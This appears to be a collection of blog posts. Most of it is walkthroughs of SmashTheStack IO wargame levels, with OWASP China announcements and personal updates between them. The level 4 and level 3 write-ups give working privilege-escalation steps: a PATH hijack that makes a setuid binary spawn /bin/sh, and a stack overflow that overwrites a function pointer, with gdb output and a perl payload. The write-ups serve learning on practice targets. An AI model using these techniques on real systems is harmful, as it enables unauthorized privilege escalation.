OWASP 2010 China Summit is now officially dated on 20~23 October 2010 in Beijing. More details will be out as the date zeroes in! I’ll update more details here as well.

level4@io:/levels$ ./level4
uid=1004(level4) gid=1004(level4) euid=1005(level5) groups=1004(level4),1029(nosu)

Looks like it is running the command id.

The id command lists the real and effective user IDs and the group IDs of the user associated with the current process. This is the counterpart to the $UID, $EUID, and $GROUPS internal Bash variables. The id command shows the effective IDs only when they differ from the real ones. – From webtools.live2support.com

You can confirm it by looking at its source code. And yes, it does have a statement

system(“id”);

which call the Linux command.

If you are familiar with this command enough, actually it is just a piece of executable which is usually located at /bin/. But why you can run the command by just typing “id“, not “/bin/id“? It is because we have environment variable in our OS. In *nix system, it is PATH, you can use echo $PATH to see what is the current value of it.

level4@io:/levels$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/games

So what we are going to do at this level are:

1. Create a piece of code or script that call “/bin/sh“
2. Redirect the “id” command to run your script
3. Execute level4 executable

Why this works because the level4 executable has euid = level5, see definition of euid. If we bring up a shell from this executable, the shell will have level5 permission automatically. Amazing enough?

Actually you can only create code or scripts under /tmp/. We can do the following to create a script their.

level4@io:/levels$ mkdir /tmp/onhacks/
level4@io:/levels$ echo “/bin/sh” > /tmp/onhacks/id
level4@io:/levels$ chmod +x /tmp/onhacks/id

Next step is to change the environment variable by running:

level4@io:/levels$ PATH=/tmp/onhacks:/usr/bin:/bin:/usr/games

Now, you are ready to grant the access next level. Remember to grab the password for level 5. It reminds us to utilitze what you learn, even a little trick can break a big hole. Think creatively and diversely.

See you in level 5.

Note:

1. Other option: You can replace the script with a piece of C code which execute execl(“/bin/sh”);
2. Your changes on environment variable will not affect others, it is scoped in the current session.

level3@io:~$ /levels/level03
Segmentation fault

Crap! I hate seeing segmentation fault, how about giving it a parameter?

level3@io:~$ /levels/level03 nosegmentationfault
Address of hmm: 0x804847f

The executable gives us a hint that hmm is the key at this level. Let’s attach gdb and see what is inside the program.

(gdb) disass hmm
Dump of assembler code for function hmm:
…
0x080484a8 <hmm+41>:    call   0×8048340 <execl@plt>

I guess we are looking at the right place, hmm is a function which execl “something”. By looking at the source code, we can confirm that the function is what we need. The remaining part to grant access is to use stack buffer overflow. How can we achieve it? Go back to the source code, there is an interesting thing.

int (*fptr)(int) = good;
…
(*fptr)((int)hmmptr);

The program is using an unusual way to execute function good, we can take advantage of it to call hmm() by rewriting the value in *fptr. Can we do this? We need to look at how the stack buffer looks like.

As you can see, the variable that is being declared later will have a smaller address. In other words, we can overwrite the values in *fptr by specifying more than 32 bytes to buf. Let’s go back to gdb and see when *fptr is being used to call.

(gdb) disass main
…
0x0804859f <main+240>:  mov    eax,DWORD PTR [ebp-0x14]
0x080485a2 <main+243>:  call   eax
…

The function is being called at 0x080485a2. Then how is the buffer looks like at that time?

(gdb) break *0x080485a2
Breakpoint 1 at 0x80485a2
(gdb) run $(perl -e ‘print “B”x40′;)
(gdb) x/20x $esp
0xbfffdcc0:     0x0804847f      0×00000000      0×00000030      0×00000000
0xbfffdcd0:     0×00000000      0×00000000      0xbfffde8d      0x0804847f
0xbfffdce0:     0×41414141      0×41414141      0×41414141      0×41414141
0xbfffdcf0:     0×41414141      0×41414141      0×41414141      0×41414141
0xbfffdd00:     0×41414141      0×42424242      0×00000000      0×00000029

According to the graph above, *fptr is located at 0xbffdd00. From the memory dump above, the first half of the variable is being replaced by 4 “A”. But actually the last 4 bytes in *fptr is already good enough because address are 4 bytes long in 32-bit machines. So what you need is constructing a string with 40 characters long, which fits into variable buf, the last 4 bytes are storing the address of hmm(). Keep in mind that the address is being stored differently in memory (It is Big-Endian).

You can create the parameter like this:

./level3 `perl -e ‘print “B”x36′; printf <Address of hmm() in Big-Endian representation>`

Ready to go to level 4? See you then.

Anyway, let’s move one to the next stage. After finishing the little thing at level1, we have a bigger thing waiting at level2 (not even a boss yet). When you first execute the program with no parameters, you will have this:

Append the 39th through 42nd numbers in the sequence as a string and feed it to this binary via argv[1]. 1, 2, 3, 5, 8, 13, 21…
The 4th through the 7th numbers would give you 581321

Easy enough? This time, you don’t really need to break the program, you just need to find what it wants and pass it as a string. Obviously, this is a Fibonacci Sequence and in this case, the 45th number (1836311903) is still fit within 2³¹-1. So, you can just write a simple program to generate the sequence then print the 39th through 42nd numbers. Or if you don’t want to write a program, any spreadsheet software should be able to help you calculate the sequence.

Not much I can tell you this time. What you can learn here is, try tackle a problem in different ways, and get familiar with what you have. See you in level 3!

The level 1 program should be located at /levels/level01. When you first execute this program w/o any parameters, it will provide you its help:

Usage: ./level01 <password>

If you type something like ./level01 password, result could be: Fail.

Let’s attach the gdb and see what is interesting in its main program.

level1@io:/levels$ gdb ./level01
(gdb) disass main
…
0x0804846c <main+120>:  call   0x804830c <strncmp@plt>
0×08048471 <main+125>:  test   %eax,%eax
0×08048473 <main+127>:  jne    0x804849f <main+171>
…
0×08048498 <main+164>:  call   0x80482ec <execl@plt>
…
0x080484be <main+202>:  ret

You will soon discover this line

0x0804846c <main+120>:  call   0x804830c <strncmp@plt>

is where we are interested in. Few lines from this statement, there is a execl call, it seems that the strncmp is being used in an if statement. So we can set a break point at 0x0804846c and see what are they comparing.

(gdb) break *0x0804846c
(gdb) run password
(gdb) i r
eax            0x80485c8        134514120
ecx            0xbfffdebd       -1073750339
…

If you try to get value at the address stored in each register, you will get the password which leads you to next level, because one of the register is pointing to the expected string that will execute the execl statement, and another one is your input. What you need to do is to run level1 program again with the right input, then you will have access to level2 and you can retrieve the password to login as level2 by looking at /home/level2/.pass.

I am not going to tell you the actual input for level1, you are just a step away from the goal after reading my logs above. Assuming you are new to gdb, what you can learn here are:

1. How to attach a debugger (gdb) to a program?
   Ans. gdb <executable path> or gdb -q <executable path>
2. How to disassemble a function in an executable?
   Ans. disass <function name>
3. How to set break point in an executable?
   Ans. break <instruction address>
4. How to run a program in gdb with parameter?
   Ans. run [<parameter>]
5. How to dump the current values of registers?
   Ans. info registers (“i r” in short)
6. How to look at the value of an address stored in a register?
   Ans. You need to figure this out.

I am moving on to next level, how about you?

Hope you enjoy playing this IO wargame.

1. I just moved from Richmond, BC to Redmond, WA. Working with my team more closely.
2. Helping my team to start up a new project for customers who want to rebrand our product as a service.
3. Started playing wargames (in security).

Yes! I am playing security wargame in SmashTheStack. The main goal is to use the program you can run in the current level to gain access to the advance level, there is always a vulnerability in the programs. It has many different types of games, depending on what vulnerability the programs have, or how you are going to break them. eg. IO, Logic, Blackbox.

I just started playing with the IO games, while all the programs I broke so far is depending on the input you gave. Usually, they have stack buffer overflow or heap buffer overflow issues.

Why I am presenting this post with subject “SmashTheStack series”? Because I would like to present the solutions (or hints) of the levels that I already solved. In the next few months, I will focus on breaking the programs there. Until I have any bright idea on a security topic that I would like to work on or share. BTW, this game is good for you to play with during leisure time.

OWASP China Research Group

To better facilitate the activities of OWASP in China for consistent and perpetual continuity, OWASP China has formed regional groups mainly tasked to support the regional sharing and discussion. We welcome you to recommend an individual to take the lead. OWASP China Research Group currently aims to build upon and go into the depths of the foundation laid out by the OWASP Foundation, plus translation of the OWASP resources ectera. There will be activities such as training in different regions. OWASP China QQ Discussion Group 78238096

(My translation above)

I hope to improve China’s internet security. I succeeded Frank and Rip on the last iteration of this project, and that is why my December has been busy all along, and took much of my time.

Thanks a lot to the people below, and especially the many Microsoft people who worked so hard even during Christmas to produce this testing guide. Sorted from last name (Mandarin) :

• Aaron (DBAPPSECURITY)
• Joanne Cheng (Microsoft)
• Frank Fan (DBAPPSECURITY)
• Karin He (Microsoft)
• Adams Li (Microsoft)
• RIP (OWASP China Chair)
• Will Shen (Microsoft)
• Chao Wang (Microsoft)
• Wei Wei (Microsoft)
• Pak Ming Cheung (Microsoft)
• Eric Chio (Microsoft)

Hope that readers of the guide will benefit much from it!

For the whole December and some January, I’ve been working for OWASP China on some projects – thus taking my full attention. And I have been busy on picking up some bits of life and my side project – yes! Working on it! It’s coming in this January!

The 2009 is a fantastic year! I am aiming well for 2010 and will aim to advance fully into my interests. More to that next time… meanwhile, stay tooned. =)

You might have noticed that I used md5 as filenames in the previous (old!) post. In most cases, it is fine.

However, what if the malware depends on a file called hgz.dll? You can calculate hgz.dll as md5, then find the filename out, now put that in the VM again – fine. But you see it is a troublesome process… that you can’t easily automate. There are other cases… of course.

Well, you get the point!